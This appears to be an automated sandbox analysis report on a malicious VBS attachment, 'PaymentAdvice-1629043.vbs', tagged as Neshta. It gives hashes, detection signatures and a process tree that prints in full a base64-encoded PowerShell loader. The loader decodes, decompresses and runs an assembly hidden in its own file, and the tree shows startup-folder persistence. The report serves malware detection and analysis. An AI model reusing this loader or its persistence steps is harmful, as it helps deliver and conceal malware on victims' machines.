Edit tour
Windows
Analysis Report
PaymentAdvice-1629043.vbs
Overview
General Information
| Sample name: | PaymentAdvice-1629043.vbs |
| Analysis ID: | 1568248 |
| MD5: | 9d7aa394cb39af2a434eb3036a35bb47 |
| SHA1: | bfcb9a3f1dcbcfce2f66f4c5c0e8dbada27dbd9f |
| SHA256: | 490022706b76b904dfe979627f775cc2be0cd6a10ae623989cf2118026a21bea |
| Tags: | Neshtavbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
Neshta
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Neshta
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 5948 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Payme ntAdvice-1 629043.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 3012 cmdline: cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\Des ktop\Payme ntAdvice-1 629043.vbs .exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2876 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
PaymentAdvice-1629043.vbs.exe (PID: 6076 cmdline: "C:\Users\ user\Deskt op\Payment Advice-162 9043.vbs.e xe" -enc J ABKAG0AcgB wAHAAYwB1A GIAcgBtAG0 AIAA9ACAAW wBTAHkAcwB 0AGUAbQAuA EQAaQBhAGc AbgBvAHMAd ABpAGMAcwA uAFAAcgBvA GMAZQBzAHM AXQA6ADoAR wBlAHQAQwB 1AHIAcgBlA G4AdABQAHI AbwBjAGUAc wBzACgAKQA uAE0AYQBpA G4ATQBvAGQ AdQBsAGUAL gBGAGkAbAB lAE4AYQBtA GUALgBSAGU AcABsAGEAY wBlACgAJwA uAGUAeABlA CcALAAnACc AKQA7ACQAS ABvAHMAZAB jAHQAaABsA HYAdABvACA APQAgAGcAZ QB0AC0AYwB vAG4AdABlA G4AdAAgACQ ASgBtAHIAc ABwAGMAdQB iAHIAbQBtA CAAfAAgAFM AZQBsAGUAY wB0AC0ATwB iAGoAZQBjA HQAIAAtAEw AYQBzAHQAI AAxADsAIAA kAFcAawBmA GMAbABsAGg AagB4ACAAP QAgAFsAUwB 5AHMAdABlA G0ALgBDAG8 AbgB2AGUAc gB0AF0AOgA 6AEYAcgBvA G0AQgBhAHM AZQA2ADQAU wB0AHIAaQB uAGcAKAAkA EgAbwBzAGQ AYwB0AGgAb AB2AHQAbwA uAFIAZQBwA GwAYQBjAGU AKAAnAFIAR QBNACAAJwA sACAAJwAnA CkALgBSAGU AcABsAGEAY wBlACgAJwB AACcALAAgA CcAQQAnACk AKQA7ACQAQ wBnAGwAYQB rAGgAegByA CAAPQAgAE4 AZQB3AC0AT wBiAGoAZQB jAHQAIABTA HkAcwB0AGU AbQAuAEkAT wAuAE0AZQB tAG8AcgB5A FMAdAByAGU AYQBtACgAI AAsACAAJAB XAGsAZgBjA GwAbABoAGo AeAAgACkAO wAkAEMAbQB qAHAAegB5A HYAcABjAHM AIAA9ACAAT gBlAHcALQB PAGIAagBlA GMAdAAgAFM AeQBzAHQAZ QBtAC4ASQB PAC4ATQBlA G0AbwByAHk AUwB0AHIAZ QBhAG0AOwA kAFUAbgB0A GkAcABmACA APQAgAE4AZ QB3AC0ATwB iAGoAZQBjA HQAIABTAHk AcwB0AGUAb QAuAEkATwA uAEMAbwBtA HAAcgBlAHM AcwBpAG8Ab gAuAEcAegB pAHAAUwB0A HIAZQBhAG0 AIAAkAEMAZ wBsAGEAawB oAHoAcgAsA CAAKABbAEk ATwAuAEMAb wBtAHAAcgB lAHMAcwBpA G8AbgAuAEM AbwBtAHAAc gBlAHMAcwB pAG8AbgBNA G8AZABlAF0 AOgA6AEQAZ QBjAG8AbQB wAHIAZQBzA HMAKQA7ACQ AVQBuAHQAa QBwAGYALgB DAG8AcAB5A FQAbwAoACA AJABDAG0Aa gBwAHoAeQB 2AHAAYwBzA CAAKQA7ACQ AVQBuAHQAa QBwAGYALgB DAGwAbwBzA GUAKAApADs AJABDAGcAb ABhAGsAaAB 6AHIALgBDA GwAbwBzAGU AKAApADsAW wBiAHkAdAB lAFsAXQBdA CAAJABXAGs AZgBjAGwAb ABoAGoAeAA gAD0AIAAkA EMAbQBqAHA AegB5AHYAc ABjAHMALgB UAG8AQQByA HIAYQB5ACg AKQA7AFsAQ QByAHIAYQB 5AF0AOgA6A FIAZQB2AGU AcgBzAGUAK AAkAFcAawB mAGMAbABsA GgAagB4ACk AOwAgACQAT wByAHkAbAB nACAAPQAgA FsAUwB5AHM AdABlAG0AL gBBAHAAcAB EAG8AbQBhA GkAbgBdADo AOgBDAHUAc gByAGUAbgB 0AEQAbwBtA GEAaQBuAC4 ATABvAGEAZ AAoACQAVwB rAGYAYwBsA GwAaABqAHg AKQA7ACAAJ ABHAGIAZwB rAGYAdABxA HAAIAA9ACA AJABPAHIAe QBsAGcALgB FAG4AdAByA HkAUABvAGk AbgB0ADsAI ABbAFMAeQB zAHQAZQBtA C4ARABlAGw AZQBnAGEAd ABlAF0AOgA 6AEMAcgBlA GEAdABlAEQ AZQBsAGUAZ wBhAHQAZQA oAFsAQQBjA HQAaQBvAG4 AXQAsACAAJ ABHAGIAZwB rAGYAdABxA HAALgBEAGU AYwBsAGEAc gBpAG4AZwB UAHkAcABlA CwAIAAkAEc AYgBnAGsAZ gB0AHEAcAA uAE4AYQBtA GUAKQAuAEQ AeQBuAGEAb QBpAGMASQB uAHYAbwBrA GUAKAApACA AfAAgAE8Ad QB0AC0ATgB 1AGwAbAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
InstallUtil.exe (PID: 4592 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- wscript.exe (PID: 344 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \Value.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - wscript.exe (PID: 5948 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Value .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 1352 cmdline:
cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\App Data\Roami ng\Value.v bs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Value.vbs.exe (PID: 5232 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Value.vbs .exe" -enc JABKAG0Ac gBwAHAAYwB 1AGIAcgBtA G0AIAA9ACA AWwBTAHkAc wB0AGUAbQA uAEQAaQBhA GcAbgBvAHM AdABpAGMAc wAuAFAAcgB vAGMAZQBzA HMAXQA6ADo ARwBlAHQAQ wB1AHIAcgB lAG4AdABQA HIAbwBjAGU AcwBzACgAK QAuAE0AYQB pAG4ATQBvA GQAdQBsAGU ALgBGAGkAb ABlAE4AYQB tAGUALgBSA GUAcABsAGE AYwBlACgAJ wAuAGUAeAB lACcALAAnA CcAKQA7ACQ ASABvAHMAZ ABjAHQAaAB sAHYAdABvA CAAPQAgAGc AZQB0AC0AY wBvAG4AdAB lAG4AdAAgA CQASgBtAHI AcABwAGMAd QBiAHIAbQB tACAAfAAgA FMAZQBsAGU AYwB0AC0AT wBiAGoAZQB jAHQAIAAtA EwAYQBzAHQ AIAAxADsAI AAkAFcAawB mAGMAbABsA GgAagB4ACA APQAgAFsAU wB5AHMAdAB lAG0ALgBDA G8AbgB2AGU AcgB0AF0AO gA6AEYAcgB vAG0AQgBhA HMAZQA2ADQ AUwB0AHIAa QBuAGcAKAA kAEgAbwBzA GQAYwB0AGg AbAB2AHQAb wAuAFIAZQB wAGwAYQBjA GUAKAAnAFI ARQBNACAAJ wAsACAAJwA nACkALgBSA GUAcABsAGE AYwBlACgAJ wBAACcALAA gACcAQQAnA CkAKQA7ACQ AQwBnAGwAY QBrAGgAegB yACAAPQAgA E4AZQB3AC0 ATwBiAGoAZ QBjAHQAIAB TAHkAcwB0A GUAbQAuAEk ATwAuAE0AZ QBtAG8AcgB 5AFMAdAByA GUAYQBtACg AIAAsACAAJ ABXAGsAZgB jAGwAbABoA GoAeAAgACk AOwAkAEMAb QBqAHAAegB 5AHYAcABjA HMAIAA9ACA ATgBlAHcAL QBPAGIAagB lAGMAdAAgA FMAeQBzAHQ AZQBtAC4AS QBPAC4ATQB lAG0AbwByA HkAUwB0AHI AZQBhAG0AO wAkAFUAbgB 0AGkAcABmA CAAPQAgAE4 AZQB3AC0AT wBiAGoAZQB jAHQAIABTA HkAcwB0AGU AbQAuAEkAT wAuAEMAbwB tAHAAcgBlA HMAcwBpAG8 AbgAuAEcAe gBpAHAAUwB 0AHIAZQBhA G0AIAAkAEM AZwBsAGEAa wBoAHoAcgA sACAAKABbA EkATwAuAEM AbwBtAHAAc gBlAHMAcwB pAG8AbgAuA EMAbwBtAHA AcgBlAHMAc wBpAG8AbgB NAG8AZABlA F0AOgA6AEQ AZQBjAG8Ab QBwAHIAZQB zAHMAKQA7A CQAVQBuAHQ AaQBwAGYAL gBDAG8AcAB 5AFQAbwAoA CAAJABDAG0 AagBwAHoAe QB2AHAAYwB zACAAKQA7A CQAVQBuAHQ AaQBwAGYAL gBDAGwAbwB zAGUAKAApA DsAJABDAGc AbABhAGsAa AB6AHIALgB DAGwAbwBzA GUAKAApADs AWwBiAHkAd ABlAFsAXQB dACAAJABXA GsAZgBjAGw AbABoAGoAe AAgAD0AIAA kAEMAbQBqA HAAegB5AHY AcABjAHMAL gBUAG8AQQB yAHIAYQB5A CgAKQA7AFs AQQByAHIAY QB5AF0AOgA 6AFIAZQB2A GUAcgBzAGU AKAAkAFcAa wBmAGMAbAB sAGgAagB4A CkAOwAgACQ ATwByAHkAb ABnACAAPQA gAFsAUwB5A HMAdABlAG0 ALgBBAHAAc ABEAG8AbQB hAGkAbgBdA DoAOgBDAHU AcgByAGUAb gB0AEQAbwB tAGEAaQBuA C4ATABvAGE AZAAoACQAV wBrAGYAYwB sAGwAaABqA HgAKQA7ACA AJABHAGIAZ wBrAGYAdAB xAHAAIAA9A CAAJABPAHI AeQBsAGcAL gBFAG4AdAB yAHkAUABvA GkAbgB0ADs AIABbAFMAe QBzAHQAZQB tAC4ARABlA GwAZQBnAGE AdABlAF0AO gA6AEMAcgB lAGEAdABlA EQAZQBsAGU AZwBhAHQAZ QAoAFsAQQB jAHQAaQBvA G4AXQAsACA AJABHAGIAZ wBrAGYAdAB xAHAALgBEA GUAYwBsAGE AcgBpAG4AZ wBUAHkAcAB lACwAIAAkA EcAYgBnAGs AZgB0AHEAc AAuAE4AYQB tAGUAKQAuA EQAeQBuAGE AbQBpAGMAS QBuAHYAbwB rAGUAKAApA CAAfAAgAE8 AdQB0AC0AT gB1AGwAbAA = MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2164 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - InstallUtil.exe (PID: 5332 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| neshta | Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word "nesta" meaning "something." | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_Neshta | Yara detected Neshta | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| Click to see the 9 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Neshta | Yara detected Neshta | Joe Security | ||
| MALWARE_Win_Neshta | Detects Neshta | ditekSHen |
| |
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||